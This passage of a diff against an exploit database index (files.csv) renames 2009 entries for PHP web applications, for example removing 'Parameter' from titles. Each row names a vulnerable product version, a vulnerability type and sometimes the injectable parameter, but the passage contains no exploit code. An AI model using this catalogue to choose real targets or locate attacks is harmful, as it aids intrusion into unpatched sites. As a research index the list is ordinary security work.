Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0 -8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0 +8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' SQL Injection",2009-03-18,girex,php,webapps,0 8243,platforms/php/webapps/8243.txt,"Bloginator 1a - Cookie Bypass / SQL Injection",2009-03-19,Fireshot,php,webapps,0 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0 @@ -21536,7 +21537,7 @@ id,file,description,date,author,platform,type,port 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0 8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - 'upldgallery.php' Arbitrary File Upload",2009-03-25,"Ahmad Pay",php,webapps,0 8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,php,webapps,0 -8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion",2009-03-26,ahmadbady,php,webapps,0 +8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusions",2009-03-26,ahmadbady,php,webapps,0 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps,0 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - Authentication Bypass",2009-03-27,Qabandi,php,webapps,0 @@ -21560,10 +21561,10 @@ id,file,description,date,author,platform,type,port 8329,platforms/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User",2009-03-31,"ThE g0bL!N",php,webapps,0 8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - (course_id) SQL Injection",2009-03-31,DarKdewiL,php,webapps,0 8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 - 'gamestat.php gameID' SQL Injection",2009-03-31,Dimi4,php,webapps,0 -8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0 -8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' Parameter SQL Injection",2009-04-01,cOndemned,php,webapps,0 +8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusions",2009-04-01,ahmadbady,php,webapps,0 +8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' SQL Injection",2009-04-01,cOndemned,php,webapps,0 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0 -8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 +8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 @@ -21575,7 +21576,7 @@ id,file,description,date,author,platform,type,port 8361,platforms/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0 8362,platforms/php/webapps/8362.php,"Lanius CMS 0.5.2 - Arbitrary File Upload",2009-04-07,EgiX,php,webapps,0 8364,platforms/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0 -8365,platforms/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - 'category' Parameter SQL Injection",2009-04-08,H!tm@N,php,webapps,0 +8365,platforms/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - 'category' SQL Injection",2009-04-08,H!tm@N,php,webapps,0 8366,platforms/php/webapps/8366.txt,"Joomla! Component MailTo - (article) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 8367,platforms/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - (viewit) Directory Traversal",2009-04-08,H!tm@N,php,webapps,0 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 @@ -21603,7 +21604,7 @@ id,file,description,date,author,platform,type,port 8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps,0 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 -8423,platforms/php/webapps/8423.txt,"Jamroom 4.0.2 - 't' Parameter Local File Inclusion",2009-04-14,zxvf,php,webapps,0 +8423,platforms/php/webapps/8423.txt,"Jamroom 4.0.2 - 't' Local File Inclusion",2009-04-14,zxvf,php,webapps,0 8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection",2009-04-14,DSecRG,php,webapps,0 8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting",2009-04-14,SirDarckCat,php,webapps,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - 'index.php lang' Local File Inclusion",2009-04-14,SirGod,php,webapps,0 @@ -21624,10 +21625,10 @@ id,file,description,date,author,platform,type,port 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0 -8455,platforms/php/webapps/8455.txt,"CPCommerce 1.2.8 - 'id_document' Parameter Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 +8455,platforms/php/webapps/8455.txt,"CPCommerce 1.2.8 - 'id_document' Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - 'ficha.php' SQL Injection",2009-04-16,snakespc,php,webapps,0 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - 'manage-admin.php' Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 -8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0 +8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusions",2009-04-16,JosS,php,webapps,0 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0 @@ -21678,7 +21679,7 @@ id,file,description,date,author,platform,type,port 8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps,0 8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,php,webapps,0 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 -8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' Parameter SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 +8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 @@ -21703,7 +21704,7 @@ id,file,description,date,author,platform,type,port 8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure",2009-05-04,ZoRLu,asp,webapps,0 8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 8600,platforms/php/webapps/8600.txt,"BluSky CMS - 'news_id' SQL Injection",2009-05-04,snakespc,php,webapps,0 -8602,platforms/php/webapps/8602.txt,"Qt QuickTeam - Multiple Remote File Inclusion",2009-05-04,ahmadbady,php,webapps,0 +8602,platforms/php/webapps/8602.txt,"Qt QuickTeam - Multiple Remote File Inclusions",2009-05-04,ahmadbady,php,webapps,0 8603,platforms/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution",2009-05-04,G4N0K,php,webapps,0 8604,platforms/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",php,webapps,0 8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Authentication Bypass",2009-05-04,"ThE g0bL!N",php,webapps,0 @@ -21766,10 +21767,10 @@ id,file,description,date,author,platform,type,port 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - Authentication Bypass",2009-05-18,snakespc,php,webapps,0 -8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 +8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0 -8715,platforms/php/webapps/8715.txt,"Pluck CMS 4.6.2 - 'langpref' Parameter Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0 +8715,platforms/php/webapps/8715.txt,"Pluck CMS 4.6.2 - 'langpref' Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0 8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin",2009-05-18,ahmadbady,php,webapps,0 8718,platforms/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps,0 @@ -21849,7 +21850,7 @@ id,file,description,date,author,platform,type,port 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - Authentication Bypass",2009-05-29,TiGeR-Dz,php,webapps,0 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",php,webapps,0 -8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0 +8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,php,webapps,0 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0 @@ -21866,7 +21867,7 @@ id,file,description,date,author,platform,type,port 8850,platforms/php/webapps/8850.txt,"PAD Site Scripts 3.6 - Arbitrary Database Backup",2009-06-01,TiGeR-Dz,php,webapps,0 8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 - 'forumspath' Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps,0 8852,platforms/php/webapps/8852.txt,"ASP Football Pool 2.3 - Remote Database Disclosure",2009-06-01,ByALBAYX,php,webapps,0 -8853,platforms/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusion",2009-06-02,YEnH4ckEr,php,webapps,0 +8853,platforms/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusions",2009-06-02,YEnH4ckEr,php,webapps,0 8854,platforms/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection",2009-06-02,YEnH4ckEr,php,webapps,0 8855,platforms/php/webapps/8855.txt,"Alstrasoft Article Manager Pro - Arbitrary File Upload",2009-06-02,ZoRLu,php,webapps,0 8856,platforms/php/webapps/8856.txt,"flashlight free edition - Local File Inclusion / SQL Injection",2009-06-02,K4m1k451,php,webapps,0 @@ -21911,7 +21912,7 @@ id,file,description,date,author,platform,type,port 8908,platforms/php/webapps/8908.txt,"Joomla! Component BookLibrary 1.5.2.4 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8911,platforms/php/webapps/8911.txt,"Joomla! Component Akobook 2.3 - (gbid) SQL Injection",2009-06-09,Ab1i,php,webapps,0 8912,platforms/php/webapps/8912.txt,"Joomla! Component com_media_library 1.5.3 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 -8913,platforms/php/webapps/8913.txt,"S-CMS 2.0b3 - Multiple Local File Inclusion",2009-06-09,YEnH4ckEr,php,webapps,0 +8913,platforms/php/webapps/8913.txt,"S-CMS 2.0b3 - Multiple Local File Inclusions",2009-06-09,YEnH4ckEr,php,webapps,0 8914,platforms/php/webapps/8914.txt,"S-CMS 2.0b3 - Multiple SQL Injections",2009-06-09,YEnH4ckEr,php,webapps,0 8915,platforms/php/webapps/8915.pl,"S-CMS 2.0b3 - 'Username' Blind SQL Injection",2009-06-09,YEnH4ckEr,php,webapps,0 8917,platforms/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 PHP - Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps,0 @@ -21954,12 +21955,12 @@ id,file,description,date,author,platform,type,port 8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0 8966,platforms/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps,0 -8968,platforms/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0 +8968,platforms/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0 8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,php,webapps,0 8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0 8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps,0 8978,platforms/php/webapps/8978.txt,"Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,php,webapps,0 -8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0 +8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusions",2009-06-17,YEnH4ckEr,php,webapps,0 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"PHPortal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 8984,platforms/php/webapps/8984.txt,"CMS buzz - Cross-Site Scripting / Password Change / HTML Injection",2009-06-18,"ThE g0bL!N",php,webapps,0 @@ -21969,7 +21970,7 @@ id,file,description,date,author,platform,type,port 8992,platforms/php/webapps/8992.php,"phpMyAdmin - pmaPWN! Code Injection Remote Code Execution Scanner & Exploit Tool",2009-06-22,"Hacking Expose!",php,webapps,0 8993,platforms/php/webapps/8993.txt,"elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password",2009-06-22,lorddemon,php,webapps,0 8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x - Insecure Cookie",2009-06-22,TiGeR-Dz,php,webapps,0 -8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion",2009-06-22,CraCkEr,php,webapps,0 +8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusions",2009-06-22,CraCkEr,php,webapps,0 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,php,webapps,0 8997,platforms/php/webapps/8997.txt,"Kasseler CMS - File Disclosure / Cross-Site Scripting",2009-06-22,S(r1pt,php,webapps,0 8998,platforms/php/webapps/8998.txt,"SourceBans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0 @@ -22012,7 +22013,7 @@ id,file,description,date,author,platform,type,port 9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0 -9052,platforms/php/webapps/9052.txt,"BigACE 2.6 - 'cmd' Parameter Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 +9052,platforms/php/webapps/9052.txt,"BigACE 2.6 - 'cmd' Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0 9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0 @@ -22078,7 +22079,7 @@ id,file,description,date,author,platform,type,port 9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,php,webapps,0 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0 9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - 'results.php Cat_ID' SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0 -9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 +9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 9176,platforms/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0 9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0 @@ -22101,9 +22102,9 @@ id,file,description,date,author,platform,type,port 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - Authentication Bypass",2009-07-21,n3w7u,php,webapps,0 9226,platforms/php/webapps/9226.txt,"phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection",2009-07-21,Moudi,php,webapps,0 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 -9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Permanent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0 +9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Persistent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0 9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure",2009-07-23,NoGe,php,webapps,0 -9236,platforms/php/webapps/9236.txt,"Groone's GLink ORGanizer 2.1 - (cat) Blind SQL Injection",2009-07-23,"599eme Man",php,webapps,0 +9236,platforms/php/webapps/9236.txt,"Groone's GLink ORGanizer 2.1 - 'cat' Blind SQL Injection",2009-07-23,"599eme Man",php,webapps,0 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Authentication Bypass",2009-07-23,SwEET-DeViL,php,webapps,0 9238,platforms/php/webapps/9238.txt,"Joomla! Component com_Joomlaoads - (packageId) SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps,0 9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Arbitrary File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 @@ -22115,7 +22116,7 @@ id,file,description,date,author,platform,type,port 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - 'url' Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0 -9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (2)",2009-07-24,skys,php,webapps,0 +9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - 'questid' SQL Injection (2)",2009-07-24,skys,php,webapps,0 9255,platforms/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure",2009-07-24,Qabandi,php,webapps,0 @@ -22139,9 +22140,9 @@ id,file,description,date,author,platform,type,port 9281,platforms/php/webapps/9281.txt,"Limny 1.01 - Authentication Bypass",2009-07-27,SirGod,php,webapps,0 9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - Authentication Bypass",2009-07-27,Evil-Cod3r,php,webapps,0 -9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0 +9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,php,webapps,0 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0 -9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' Parameter SQL Injection",2009-07-28,MizoZ,php,webapps,0 +9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' SQL Injection",2009-07-28,MizoZ,php,webapps,0 9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,php,webapps,0 9290,platforms/php/webapps/9290.txt,"In-portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 @@ -22155,12 +22156,12 @@ id,file,description,date,author,platform,type,port 9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - (path/sitemap/relPath) Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting",2009-07-30,SirGod,php,webapps,0 9312,platforms/php/webapps/9312.txt,"d.net CMS - Local File Inclusion / SQL Injection",2009-07-30,SirGod,php,webapps,0 -9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Parameter Local File Inclusion",2009-07-30,SirGod,php,webapps,0 +9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0 9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0 9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - 'forum.php' SQL Injection",2009-08-01,rEcruit,php,webapps,0 -9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusion",2009-08-01,NoGe,php,webapps,0 +9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusions",2009-08-01,NoGe,php,webapps,0 9324,platforms/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass / File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0 @@ -22230,13 +22231,13 @@ id,file,description,date,author,platform,type,port 9438,platforms/php/webapps/9438.txt,"PHP Competition System 0.84 - (competition) SQL Injection",2009-08-14,Mr.SQL,php,webapps,0 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0 -9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion",2009-08-18,jetli007,php,webapps,0 +9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusions",2009-08-18,jetli007,php,webapps,0 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0 -9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0 +9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' SQL Injection",2009-08-18,NoGe,php,webapps,0 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 9450,platforms/php/webapps/9450.txt,"vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0 -9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 